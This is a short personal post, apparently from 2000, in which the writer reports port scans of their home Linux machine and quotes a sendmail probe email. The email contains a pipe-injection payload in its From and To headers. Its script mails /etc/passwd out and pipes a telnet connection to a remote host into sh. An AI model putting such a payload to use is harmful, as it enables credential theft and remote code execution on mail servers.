Somebody from 188.8.131.52 is port scanning my home machine. My home machine is a dialup running linux with a dynamic ip address. I don't know why they would be interested in gaining access to my machine.
They tested for sendmail vulernabilities as well.
Date: Sat, 12 Aug 2000 10:31:24 +1000 (EST) From: |tail|sh To: <bin@localhost>|tail|sh bin@localhost Subject: ISS (This Email does not indicate a vulnerability)
# IGNORE THE BELOW MESSAGE. # testing sendmail remote bug #!/bin/shcat > /tmp/smail.bad <<EOFSubject: ISS - Sendmail Security Vulnerability Report Sendmail on the originating host is Vulnerable to Intruders. Please contact your Vendor for the Newest Sendmail version. E-mail: <email@example.com> for Internet Security Scanner Information. EOF cat /tmp/smail.bad /etc/passwd | mail postmaster ( sleep 2 ; echo quit ) | telnet 184.108.40.206 5700 | sh >> /tmp/tel.out 2>/tmp/tel.err
My nephew is having a party to celebrate his 6th birthday today.